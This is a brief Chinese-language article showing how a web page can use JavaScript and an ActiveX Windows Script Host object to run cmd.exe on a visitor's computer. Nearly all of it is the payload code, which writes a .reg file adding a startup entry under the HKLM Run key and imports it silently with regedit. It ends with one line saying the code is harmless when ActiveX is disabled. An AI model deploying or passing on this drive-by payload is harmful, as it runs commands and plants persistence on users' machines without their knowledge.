作者:邬畏畏
在网页中我们可以利用javascript执行客户端的WSH,下面代码展示了在网页中创建WSH对象并且运行cmd.exe创建文件并操作注册表。
document.write("<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></object>");
wsh.Run('cmd.exe');
wsh.Run('cmd.exe /c echo Windows Registry Editor Version 5.00>>auto.reg');
wsh.Run('cmd.exe /c echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]>auto.reg');
wsh.Run('cmd.exe /c echo @="cmd.exe">>auto.reg');
wsh.Run('cmd.exe /c regedit /s auto.reg');
上述代码存为HTML格式。
当然如果浏览器的安全级别设置的较高(如:禁用ActiveX等相关设置),上述代码就没有威胁了。